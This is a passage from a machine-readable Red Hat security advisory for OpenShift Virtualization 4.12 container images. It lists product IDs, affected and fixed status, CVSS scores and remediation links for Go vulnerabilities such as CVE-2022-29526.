"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: encoding/xml: stack exhaustion in Decoder.Skip", }, { acknowledgments: [ { names: [ "Joël Gähwiler", ], summary: "Acknowledged by upstream.", }, ], cve: "CVE-2022-29526", cwe: { id: "CWE-280", name: "Improper Handling of Insufficient Permissions or Privileges ", }, discovery_date: "2022-05-11T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2084085", }, ], notes: [ { category: "description", text: "A flaw was found in the syscall.Faccessat function when calling a process by checking the group. This flaw allows an attacker to check the process group permissions rather than a member of the file's group, affecting system availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: syscall: faccessat checks wrong group", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-29526", }, { category: "external", summary: "RHBZ#2084085", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084085", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-29526", url: "https://www.cve.org/CVERecord?id=CVE-2022-29526", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", url: "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", }, ], release_date: "2022-05-11T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "LOCAL", availabilityImpact: "HIGH", baseScore: 6.2, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: syscall: faccessat checks wrong group", }, { cve: "CVE-2022-30629", cwe: { id: "CWE-331", name: "Insufficient Entropy", }, discovery_date: "2022-06-02T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", 